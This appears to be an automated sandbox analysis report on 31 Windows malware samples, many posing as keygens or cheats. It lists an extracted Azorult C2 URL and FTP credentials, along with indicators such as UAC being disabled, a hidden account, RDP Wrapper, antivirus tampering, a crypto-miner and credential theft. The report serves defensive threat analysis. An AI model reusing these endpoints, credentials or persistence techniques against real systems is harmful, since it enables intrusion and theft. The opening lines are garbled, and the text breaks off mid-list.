Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8Analysis
-
max time kernel
1804s -
max time network
1816s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 13:14
Static task
static1
Behavioral task
behavioral1
Sample
08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll
Resource
win10v20201028
Behavioral task
behavioral2
Sample
0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
1.bin/1.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
2b5e50bc3077610128051bc3e657c3f0e331fb8fed2559c6596911890ea866ba.dll
Resource
win10v20201028
Behavioral task
behavioral6
Sample
2c01b007729230c415420ad641ad92eb.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
42f972925508a82236e8533567487761.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
42f972925508a82236e8533567487761(1).exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
6a9e7107c97762eb1196a64baeadb291.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral19
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
KLwC6vii.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral26
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral28
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
SecuriteInfo.com.Gen.NN.ZexaF.34108.xy1@amqiedE.17985.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
Resource
win10v20201028
General
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral26/files/0x000100000001abe6-33.dat acprotect behavioral26/files/0x000100000001abe5-32.dat acprotect -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
TTPs:
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral26/files/0x000200000001abeb-758.dat xmrig behavioral26/files/0x000200000001abeb-764.dat xmrig -
Processes:
resource yara_rule behavioral26/files/0x000100000001abe3-19.dat aspack_v212_v242 behavioral26/files/0x000100000001abe3-18.dat aspack_v212_v242 behavioral26/files/0x000100000001abe3-28.dat aspack_v212_v242 behavioral26/files/0x000100000001abe3-30.dat aspack_v212_v242 behavioral26/files/0x000100000001abe3-31.dat aspack_v212_v242 behavioral26/files/0x000200000001a50e-34.dat aspack_v212_v242 behavioral26/files/0x000200000001a50e-37.dat aspack_v212_v242 behavioral26/files/0x000200000001a50e-38.dat aspack_v212_v242 behavioral26/files/0x000200000001a50e-140.dat aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
taskhost.exeLtHv0O2KZDK4M637.execmd.exedescription ioc process File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts LtHv0O2KZDK4M637.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File created C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe -
Executes dropped EXE 20 IoCs
Processes:
wini.exewinit.exerutserv.exesys.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeRar.exeRDPWInst.exeRDPWInst.exeaudiodg.exeMicrosoftHost.exepid process 912 wini.exe 2176 winit.exe 3628 rutserv.exe 2972 sys.exe 504 rutserv.exe 696 rutserv.exe 2276 rutserv.exe 2072 rfusclient.exe 2272 rfusclient.exe 372 rfusclient.exe 2196 cheat.exe 1696 taskhost.exe 1296 taskhostw.exe 360 R8.exe 1732 winlogon.exe 4332 Rar.exe 4224 RDPWInst.exe 4480 RDPWInst.exe 2428 audiodg.exe 5208 MicrosoftHost.exe -
Modifies Windows Firewall 1 TTPs
TTPs:
-
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral26/files/0x000100000001abe6-33.dat upx behavioral26/files/0x000100000001abe5-32.dat upx behavioral26/files/0x000200000001abf1-269.dat upx behavioral26/files/0x000200000001abf1-268.dat upx -
Loads dropped DLL 5 IoCs
Processes:
sys.exesvchost.exepid process 2972 sys.exe 2972 sys.exe 2972 sys.exe 2972 sys.exe 4664 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 5908 icacls.exe 2256 icacls.exe 5768 icacls.exe 3420 icacls.exe 816 icacls.exe 6076 icacls.exe 5176 icacls.exe 5344 icacls.exe 4176 icacls.exe 5356 icacls.exe 5444 icacls.exe 5652 icacls.exe 4616 icacls.exe 1056 icacls.exe 5876 icacls.exe 4376 icacls.exe 3924 icacls.exe 5688 icacls.exe 5332 icacls.exe 5984 icacls.exe 5388 icacls.exe 3956 icacls.exe 4808 icacls.exe 5764 icacls.exe 5264 icacls.exe 6056 icacls.exe 6096 icacls.exe 5540 icacls.exe 4380 icacls.exe 5620 icacls.exe 4356 icacls.exe 5676 icacls.exe 4420 icacls.exe 4580 icacls.exe 3980 icacls.exe 5304 icacls.exe 6044 icacls.exe 5936 icacls.exe 5076 icacls.exe 4520 icacls.exe 5952 icacls.exe 4764 icacls.exe 6100 icacls.exe 5576 icacls.exe 5312 icacls.exe 5300 icacls.exe 1764 icacls.exe 5296 icacls.exe 3892 icacls.exe 4840 icacls.exe 5832 icacls.exe 5244 icacls.exe 5272 icacls.exe 5424 icacls.exe 6084 icacls.exe 5956 icacls.exe 5380 icacls.exe 5484 icacls.exe 5592 icacls.exe 5520 icacls.exe 6068 icacls.exe 6060 icacls.exe 2704 icacls.exe 2652 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
LtHv0O2KZDK4M637.exetaskhostw.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run LtHv0O2KZDK4M637.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
TTPs:
-
Processes:
LtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
TTPs:
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
RDPWInst.exeLtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral26/files/0x000100000001abe4-8.dat autoit_exe behavioral26/files/0x000100000001abe4-9.dat autoit_exe -
Drops file in Program Files directory 31 IoCs
Processes:
taskhost.exeattrib.exeattrib.exeRDPWInst.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File opened for modification C:\Program Files\ESET attrib.exe File opened for modification C:\Program Files\AVAST Software\Avast attrib.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\Malwarebytes\Anti-Malware attrib.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\Microsoft JDX taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File opened for modification C:\Program Files (x86)\Zaxar taskhost.exe File created C:\Program Files\Common Files\System\iexplore.exe taskhost.exe File opened for modification C:\Program Files\ByteFence taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File created C:\Program Files\Common Files\System\iediagcmd.exe taskhost.exe File opened for modification C:\Program Files\360\Total Security attrib.exe -
Drops file in Windows directory 8 IoCs
Processes:
taskhost.exeattrib.exedescription ioc process File opened for modification C:\Windows\java.exe taskhost.exe File opened for modification C:\WINDOWS\McMwt attrib.exe File created C:\Windows\boy.exe taskhost.exe File opened for modification C:\Windows\boy.exe taskhost.exe File created C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\NetworkDistribution taskhost.exe File created C:\Windows\java.exe taskhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
spoolsv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID spoolsv.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
sys.exewinit.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sys.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sys.exe -
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4552 timeout.exe 5596 timeout.exe 5924 timeout.exe 3452 timeout.exe 3968 timeout.exe 5064 timeout.exe 5776 timeout.exe 2204 timeout.exe 1268 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 4660 ipconfig.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1288 taskkill.exe 2016 taskkill.exe 4500 taskkill.exe 5944 taskkill.exe 5384 taskkill.exe 5440 taskkill.exe -
Modifies data under HKEY_USERS 18 IoCs
Processes:
spoolsv.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe -
Modifies registry class 6 IoCs
Processes:
winit.exeR8.execmd.exewini.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings wini.exe -
NTFS ADS 2 IoCs
Processes:
taskhostw.exeLtHv0O2KZDK4M637.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ LtHv0O2KZDK4M637.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 2060 regedit.exe 1428 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
LtHv0O2KZDK4M637.exepid process 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe 1192 LtHv0O2KZDK4M637.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhostw.exepid process 1296 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 620 620 620 -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 372 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exedescription pid process Token: SeDebugPrivilege 3628 rutserv.exe Token: SeDebugPrivilege 696 rutserv.exe Token: SeTakeOwnershipPrivilege 2276 rutserv.exe Token: SeTcbPrivilege 2276 rutserv.exe Token: SeTcbPrivilege 2276 rutserv.exe Token: SeDebugPrivilege 1192 LtHv0O2KZDK4M637.exe Token: SeDebugPrivilege 1192 LtHv0O2KZDK4M637.exe Token: 9800651925390289900 1192 LtHv0O2KZDK4M637.exe Token: 9800658522458876690 1192 LtHv0O2KZDK4M637.exe Token: 9800665119528512256 1192 LtHv0O2KZDK4M637.exe Token: 9800687109789641548 1192 LtHv0O2KZDK4M637.exe Token: 9800702502950726298 1192 LtHv0O2KZDK4M637.exe Token: 9800712398553737857 1192 LtHv0O2KZDK4M637.exe Token: 9800717896110762672 1192 LtHv0O2KZDK4M637.exe Token: 9800725592690911909 1192 LtHv0O2KZDK4M637.exe Token: 9800727791712725727 1192 LtHv0O2KZDK4M637.exe Token: 9800754179988122135 1192 LtHv0O2KZDK4M637.exe Token: 9800760777056709125 1192 LtHv0O2KZDK4M637.exe Token: 9800773971226389081 1192 LtHv0O2KZDK4M637.exe Token: 9800797060966313368 1192 LtHv0O2KZDK4M637.exe Token: 9800799259989175698 1192 LtHv0O2KZDK4M637.exe Token: 9800803658034900366 1192 LtHv0O2KZDK4M637.exe Token: 9800817951684685217 1192 LtHv0O2KZDK4M637.exe Token: 9800927902860307709 1192 LtHv0O2KZDK4M637.exe Token: 9800945495043206157 1192 LtHv0O2KZDK4M637.exe Token: 9800955390545292328 1192 LtHv0O2KZDK4M637.exe Token: 9800983479627672679 1192 LtHv0O2KZDK4M637.exe Token: 9800987276376928147 1192 LtHv0O2KZDK4M637.exe Token: 9801108222667910857 1192 LtHv0O2KZDK4M637.exe Token: 9801113720224935672 1192 LtHv0O2KZDK4M637.exe Token: 9801119217783271147 1192 LtHv0O2KZDK4M637.exe Token: 9801132411919396367 1192 LtHv0O2KZDK4M637.exe Token: 9801139009021537853 1192 LtHv0O2KZDK4M637.exe Token: 9801147805114035749 1192 LtHv0O2KZDK4M637.exe Token: 9801166496807186024 1192 LtHv0O2KZDK4M637.exe Token: 9801175292899680656 1192 LtHv0O2KZDK4M637.exe Token: 9801178591433056649 1192 LtHv0O2KZDK4M637.exe Token: 9801179690944356748 1192 LtHv0O2KZDK4M637.exe Token: 9801185188501643711 1192 LtHv0O2KZDK4M637.exe Token: 9801189586548416939 1192 LtHv0O2KZDK4M637.exe Token: 9801203880195842498 1192 LtHv0O2KZDK4M637.exe Token: 9801204979708453313 1192 LtHv0O2KZDK4M637.exe Token: 9801217074334065126 1192 LtHv0O2KZDK4M637.exe Token: 9801220372867440927 1192 LtHv0O2KZDK4M637.exe Token: 9801230268471238970 1192 LtHv0O2KZDK4M637.exe Token: 9801237965083894063 1192 LtHv0O2KZDK4M637.exe Token: 9801240164107804961 1192 LtHv0O2KZDK4M637.exe Token: 9801248960198205769 1192 LtHv0O2KZDK4M637.exe Token: 9801264353359290727 1192 LtHv0O2KZDK4M637.exe Token: 9801284144564002985 1192 LtHv0O2KZDK4M637.exe Token: 9801288542610776229 1192 LtHv0O2KZDK4M637.exe Token: 9801298438213525696 1192 LtHv0O2KZDK4M637.exe Token: 9801302836258201852 1192 LtHv0O2KZDK4M637.exe Token: 867634522891771310 1192 LtHv0O2KZDK4M637.exe Token: 85899345940 1192 LtHv0O2KZDK4M637.exe Token: 0 1192 LtHv0O2KZDK4M637.exe Token: 274877907072 1192 LtHv0O2KZDK4M637.exe Token: 0 1192 